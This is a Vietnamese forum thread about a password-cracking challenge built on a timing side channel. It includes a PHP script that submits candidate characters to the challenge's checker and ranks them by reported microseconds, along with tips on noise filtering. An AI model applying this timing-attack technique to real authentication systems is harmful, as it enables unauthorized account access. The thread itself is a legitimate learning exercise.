g4mm4: nó đang trên xe về quê rồi anh iu ko thể sleep giùm anh dc đâu )
với lại mấy bài này nó dựa vào xác suất thôi, vì khác biệt 1 kí tự nó chỉ chênh lệch trong vài ms. Anh thêm sleep vào thì còn crack gì nữa  

@crazyboy: chắc chắn cái chiều dài password là _8_, còn bắt đầu bechmark tiếp thì cái time nó tào lao đó nha, lúc 13 microseconds, lúc 46 microseconds, lúc 230 microseconds =]... Check lại đi crazyboy, hoặc là cho nó usleep() vài microseconds trước khi check cái kí tự kế tiếp. 

@LeVuHoang: nó có check cái len trong main() 

gamma95 wrote:

@LeVuHoang: nó có check cái len trong main() 

Nhờ quăng cái code lên nên mới biết được chiều dài là 8. Công nhận là SCA thì ai không có kinh nghiệm sẽ rất khó tấn công.

Cái này phải viết tool để tự submit và parse kết quả, chứ ngồi click click đến bao giờ mới xong  

jcisio wrote:

gamma95 wrote:

@LeVuHoang: nó có check cái len trong main() 

Nhờ quăng cái code lên nên mới biết được chiều dài là 8. Công nhận là SCA thì ai không có kinh nghiệm sẽ rất khó tấn công.

Cái này phải viết tool để tự submit và parse kết quả, chứ ngồi click click đến bao giờ mới xong  

Hehe không đúng rồi bạn ơi Thử test một string với 8 kí tự so với các chuỗi có số kí tự khác sẽ thấy khác biết đó!
 

#!/usr/bin/php
<?php
$ch = FALSE;

function parse_result($pass, &$ch) {
  $url = 'http://crazyboy.bshellz.net/cgi-bin/checkpass.py';

  if (! $ch) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  }

  curl_setopt ($ch, CURLOPT_POSTFIELDS, array('pass' => $pass, 'checkpass' => "Check normal"));
  $content = curl_exec($ch);
  if (preg_match('/spent (\d+) microseconds/s', $content, $match)) {
    return $match[1];
  }
  else {
    return FALSE;
  }
}

$start = '';
for ($k=0; $k<256; $k++) {
  $total[$k] = 0;
  $that = 0;
  for ($j=0; $j<3; $j++) {
    $total[$k] += parse_result($start . chr($k), $ch);
  }
  if ($total[$that] < $total[$k]) {
    $that = $k;
  }
}
arsort($total);
$suspect = array_slice($total, 0, 10, TRUE);
print_r($suspect);
$codes = array_keys($suspect);
printf("The next character of '%s' could be '%s' or '%s' or '%s'\n", $start, chr($codes[0]), chr($codes[1]), chr($codes[2]));

curl_close($ch);

Chạy lại lần nữa thấy sai! Hoá ra đoạn code trên bị sai, cần sửa lại. Mọi người tự tìm chỗ sai nhé Thêm nữa là để cho tự động, thì cần dùng thêm thống kê để loại khoảng 30% những lần test có biên độ cao so với trung bình (của cùng 1 giá trị thử). 

, pass có 8 ký tự thôi, mình check tay cũng ra mà . Mới xuống xe, mệt vãi lúa =]] 

@jcisio: thế này nha, lần đầu gõ a và click và "ngó nghiêng"
lần 2 gõ aa click và lại ngó nghiêng
....

lần 8 gõ aaaaaaaa , click và lại ngó nghiêng

Cả thảy chỉ có 8 lần click/gõ/ngõ nghiêng và số phím cần gõ là 1+2+3+......+8
Sao tới trăm lần và trăm phím dc nhỉ

@g4mm4: anh test lúc nửa đêm đó, để CPU nó chạy cho chuẩn ) 

Chạy lại lần nữa thấy sai! Hoá ra đoạn code trên bị sai, cần sửa lại. Mọi người tự tìm chỗ sai nhé Thêm nữa là để cho tự động, thì cần dùng thêm thống kê để loại khoảng 30% những lần test có biên độ cao so với trung bình (của cùng 1 giá trị thử). 

Ngay cả code exploit khi chạy ở localhost, server load < 0.1 mà cũng chưa ai đưa lên, mấy bác còn đòi code exploit trang web kia. Có code để làm gì, trong khi không chịu thảo luận về ý tưởng, mà cứ chăm chăm đọc bài giải.

Làm bài đơn giản này trước đi: "có phải password bắt đầu bằng chuỗi CrB1T" không. Nếu đúng, thì thời gian tính chuỗi CrB1Taaa và aaaaaaaa có độ cách biệt lớn, không thì thời gian chỉ xấp xỉ nhau. Mấy bác có đủ khả năng đo thời gian này không? 

jcisio wrote:

Ngay cả code exploit khi chạy ở localhost, server load < 0.1 mà cũng chưa ai đưa lên, mấy bác còn đòi code exploit trang web kia. Có code để làm gì, trong khi không chịu thảo luận về ý tưởng, mà cứ chăm chăm đọc bài giải.

Làm bài đơn giản này trước đi: "có phải password bắt đầu bằng chuỗi CrB1T" không. Nếu đúng, thì thời gian tính chuỗi CrB1Taaa và aaaaaaaa có độ cách biệt lớn, không thì thời gian chỉ xấp xỉ nhau. Mấy bác có đủ khả năng đo thời gian này không? 

Ê bồ, code thì có gì đâu ta? cái wan trọng là cái server của tác giả crazyboy nó ko stable thì làm sao mà chạy ??? Có một bạn khuyên nên exploit vào buổi tối mới hài chứ  

1/ Thế code đó khi đem cái crackpass.py về localhost chạy nó có thành công không?

2/ Nếu server không stable mà chạy không được thì code chưa tốt rồi, cần suy nghĩ thêm. Ở trên có gợi ý cách giải quyết đó. 

Việc giải mã là khả thi nếu như cái CPU chạy ổn định và phải có một chút may mắn là lúc đó không có ai cùng đang connect vào và test cái exploit. Nghe thật là lame.

Cái code của crazyboy chỉ để nghịch thôi chứ thực thế không thể làm được, bạn nào tìm ra pass mà không cần sử dụng cái đoạn in ra thời gian xử lý thì mình mới phục là tài